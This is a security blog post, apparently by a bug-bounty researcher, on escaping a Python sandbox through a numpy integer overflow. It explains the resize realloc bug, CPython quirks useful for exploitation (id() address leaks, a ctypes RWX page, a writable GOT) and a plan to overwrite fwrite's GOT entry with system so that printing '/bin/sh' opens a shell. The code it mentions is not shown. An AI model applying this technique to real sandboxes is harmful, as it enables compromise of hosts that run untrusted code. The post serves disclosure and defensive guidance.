Escaping a Python sandbox with a memory corruption bug

A few weeks ago I decided to scratch an itch I’ve been having for a while — to participate in some bug bounty programs. Perhaps the most daunting task of the bug bounty game is to pick a program which yields the highest return on investment. Soon though, I stumbled upon a web application that executes user-submitted code in a Python sandbox. This looked interesting so I decided to pursue it.

Let me out of this god-forsaken sandbox!

After a bit of poking around, I discovered how to break out of the sandbox with some hacks at the Python layer. Report filed. Bugs fixed, and a nice reward to boot, all within a couple days. Sweet! A great start to my bug bounty adventures. But this post isn’t about that report. All in all, the issues I discovered are not that interesting from a technical perspective. And it turns out the issues were only present because of a regression.

But I wasn’t convinced that securing a Python sandbox would be so easy. Without going into too much detail, the sandbox uses a combination of OS-level isolation and a locked-down Python interpreter. The Python environment uses a custom whitelisting/blacklisting scheme to prevent access to unblessed builtins, modules, functions, etc. The OS-based isolation offers some extra protection, but it is antiquated by today’s standards. Breaking out of the locked-down Python interpreter is not a 100% win, but it puts the attacker dangerously close to being able to compromise the entire system.

So I returned to the application and prodded some more. No luck. This is indeed a tough cookie. But then I had a thought — Python modules are often just thin wrappers of mountainous C codebases. Surely there are gaggles of memory corruption vulns waiting to be found. Exploiting a memory corruption bug would let me break out of the restricted Python environment.

Where to begin? I know the set of Python modules which are whitelisted for importation within the sandbox. Perhaps I should run a distributed network of AFL fuzzers? Or a symbolic execution engine? Or maybe I should scan them with a state of the art static analysis tool? Sure, I could have done any of those things. Or I could have just queried the some bug trackers.

Turns out I did not have this hindsight when beginning the hunt, but it did not matter much. My intuition led me to discovering an exploitable memory corruption vulnerability in one of the sandboxes’ whitelisted modules via manual code review and testing. The bug is in Numpy, a foundational library for scientific computing — the core of many popular packages, including scipy and pandas. To get a rough idea of Numpy’s potential as a source of memory corruption bugs, let’ check out the lines-of-code counts.

In the remainder of this post, I first describe the conditions which lead to the vulnerability. Next, I discuss some quirks of the CPython runtime which exploit developers should be aware of, and then I walk through the actual exploit. Finally, I wrap up with thoughts on quantifying the risk of memory corruption issues in Python applications.

The Vulnerability

The vulnerability which I am going to walk through is an integer overflow bug in Numpy v1.11.0 (and probably older versions). The issue has been fixed since v1.12.0, but there was no security advisory issued.

The vulnerability resides in the API for resizing Numpy’s multidimensional array-like objects, ndarray and friends. resize is called with a tuple defining the array’s shape, where each element of the tuple is the size of a dimension.

Sidenote: Yup, the array is leaking uninitialized memory, but we won’t be focusing on that in this post.

Under the covers, resize actually realloc's a buffer, with the size calculated as the product of each element in the shape tuple and the element size. So in the prior snippet of code, arr.resize((2, 3)) boils down to C code realloc(buffer, 2 * 3 * sizeof(int32)). The next code snippet is the heavily paraphrased implementation of resize in C.

Spot the vulnerability? You can see inside the for-loop (line 13) that each dimension is multiplied to produce the new size. Later on (line 25) the product of the new size and the element size is passed as the size to realloc memory which holds the array. There is some validation on the new size prior to realloc, but it does not check for integer overflow, meaning that very large dimensions can result in an array which is allocated with insufficient size. Ultimately, this gives the attacker a powerful exploit primitive: the ability to read or write arbitrary memory by indexing from an array with overflown size.

Let’s develop a quick proof of concept that proves the bug exists.

Quirks of the CPython runtime

Before we walk through developing the exploit, I would like to discuss some ways in which the CPython runtime eases exploitation, but also ways in which it can frustrate the exploit developer. Feel free to skip this section if you want to dive straight into the exploit.

Leaking memory addresses

Typically one of the first hurdles exploits must deal with is to defeat address-space layout randomization (ASLR). Fortunately for attackers, Python makes this easy. The builtin id function returns the memory address of an object, or more precisely the address of the PyObject structure which encapsulates the object.

In real-world applications, developers should make sure not to expose id(object) to users. In a sandboxed, environment there is not much you could do about this behavior, except perhaps blacklisting id or re-implementing idto return a hash.

Understand memory allocation behavior

Understanding your allocator is critical for writing exploits. Python has different allocation strategies based on object type and size. Let’s check out where our big string 0xa52cd0, little string 0x7ffff7f65848, and numpy array 0x7ffff7e777b0 landed.

Python object structure

Leaking and corrupting Python object metadata can be quite powerful, so it’s useful to understand how Python objects are represented. Under the covers, Python objects all derive from PyObject, a structure which contains a reference count and a descriptor of the object’s actual type. Of note, the type descriptor contains many fields, including function pointers which could be useful to read or overwrite.

Let’s inspect the small string we created in the section just prior.

Shellcode like it’s 1999

The ctypes library serves as a bridge between Python and C code. It provides C compatible data types, and allows calling functions in DLLs or shared libraries. Many modules which have C bindings or require calling into shared libraries require importing ctypes.

I noticed that importing ctypes results in the mapping of a 4K-sized memory region set with read/write/execute permissions. If it wasn’t already obvious, this means that attackers do not even need to write a ROP chain. Exploiting a bug is as simple as pointing the instruction pointer at your shellcode, granted you have already located the RWX region.

Test it for yourself!

Investigating further, I discovered that libffi’s closure API is responsible for mmaping the RWX region. However, the region cannot be allocated RWX on certain platforms, such as systems with selinux enforced or PAX mprotect enabled, and there is code which works around this limitation.

I did not spend much time trying to reliably locate the RWX mapping, but in theory it should be possible if you have an arbitrary-read exploit primitive. While ASLR is applied to libraries, the dynamic linker maps the regions of the library in a predictable order. A library’s regions include its globals which are private to the library and the code itself. Libffi stores a reference to the RWX region as a global. If for example you find a pointer to a libffi function on the heap, then you could precalculate the address of the RWX-region pointer as an offset from the address of the libffi function pointer. The offset would need to be adjusted for each library version.

De facto exploit mitigations

I tested out security-related compiler flags for the Python2.7 binary on Ubuntu 14.04.5 and 16.04.1. There are a couple of weaknesses which are quite useful for the attacker:

Partial RELRO: The executable’s GOT section, which contains pointers to library functions dynamically linked into the binary, is writable. Exploits could replace the address of printf() with system() for example.
No PIE: The binary is not a Position-Independent Executable, meaning that while the kernel applies ASLR to most memory mappings, the contents of the binary itself are mapped to static addresses. Since the GOT section is part of the binary, no PIE makes it easier for attackers to locate and write to the GOT.

Road blocks

While CPython is an environment full of tools for the exploit developer, there are forces which broke many of my exploit attempts and were difficult to debug.

The garbage collector, type system, and possibly other unknown forces will break your exploit if you aren’t careful about clobbering object metadata.
id() can be unreliable. For reasons I could not determine, Python appears sometimes to pass a copy of the object while the the original object is used .
The region where objects are allocated is somewhat unpredictable. For reasons I could not determine, certain coding patterns led to buffers being allocated in the brk heap, while other patterns led to allocation in a python-specific mmap‘d heap.

The exploit

Soon after discovering the numpy integer overflow, I submitted a report to the bug bounty with a proof of concept that hijacked the instruction pointer, but did not inject any code. When I initially submitted I did not realize that the PoC was actually pretty unreliable, and I wasn’t able to test it properly against their servers because validating hijack of the instruction pointer requires access to core dumps or a debugger. The vendor acknowledged the issue’s legitimacy, but they gave a less generous reward than for my first report.

Fair enough!

I’m not really an exploit developer, but I challenged myself to do better. After much trial and error, I eventually wrote an exploit which appears to be reliable. Unfortunately I was never able to test it in the vendor’s sandbox because they updated numpy before I could finish, but it does work when testing locally in a Python interpreter.

At a high level, the exploit gains an arbitrary read/write exploit primitive by overflowing the size of a numpy array. The primitive is used to write the address of system to fwrite's GOT/PLT entry. Finally, Python’s builtin print calls fwrite under the covers, so now you can call print '/bin/sh' to get a shell, or replace /bin/sh with any command.

There is a bit more to it than the high-level explanation, so check out the exploit in full below. I recommend to begin reading from the bottom-up, including comments. If you are using a different version of Python, adjust the GOT locations for fwrite and system before you run it.

Running the exploit gives you a “hacked” shell.

Quantifying the risk

It is well known that much of Python’s core and many third-party modules are thin wrappers of C code. Perhaps less recognized is the fact that memory corruption bugs are reported in popular Python modules all the time without so much as a CVE, a security advisory, or even a mention of security fixes in release notes.

So yes, there are a lot of memory corruption bugs in Python modules. Surely not all of them are exploitable, but you have to start somewhere. To reason about the risk posed by memory corruption bugs, I find it helpful to frame the conversation in terms of two discrete use-cases: regular Python applications, and sandboxing untrusted code.

Regular applications

The types of applications we’re concerned with are those having a meaningful attack surface. Think web applications and other network-facing services, client applications which process untrusted content, privileged system services, etc. Many of these applications import Python modules built against mountains of C code from projects which do not treat their memory corruption bugs as security issues. The pure thought of this may keep some security professionals up at night, but in reality the risk is typically downplayed or ignored. I suspect there are a few reasons:

The difficulty to remotely identify and exploit memory corruption issues is quite high, especially for closed-source and remote applications.
The likelihood that an application exposes a path for untrusted input to reach a vulnerable function is probably quite low.
Awareness is low because memory corruption bugs in Python modules are not typically tracked as security issues.

So fair enough, the likelihood of getting compromised due to a buffer overflow in some random Python module is probably quite low. But then again, memory corruption flaws can be extremely damaging when they do happen. Sometimes it doesn’t even take anyone to explicitly exploit them to cause harm (re: cloudbleed). To make matters worse, it’s nigh impossible to keep libraries patched when library maintainers do not think about memory corruption issues in terms of security.

If you develop a major Python application, I suggest you at least take an inventory of the Python modules being used. Try to find out how much C code your modules are reliant upon, and analyze the potential for exposure of native code to the edge of your application.

Sandboxing

There are a number of services out there that allow users to run untrusted Python code within a sandbox. OS-level sandboxing features, such as linux namespaces and seccomp, have only become popular relatively recently in the form of Docker, LXC, etc. Weaker sandboxing techniques can unfortunately still be found in use today — at the OS layer in the form of chroot jails, or worse, sandboxing can be done entirely in Python (see pypy-sandbox and pysandbox).

Memory corruption bugs completely break sandboxing which is not enforced by the OS. The ability to execute a subset of Python code makes exploitation far more feasible than in regular applications. Even pypy-sandbox, which claims to be secure because of its two-process model which virtualizes system calls, can be broken by a buffer overflow.

If you want to run untrusted code of any kind, invest the effort in building a secure OS and network architecture to sandbox it.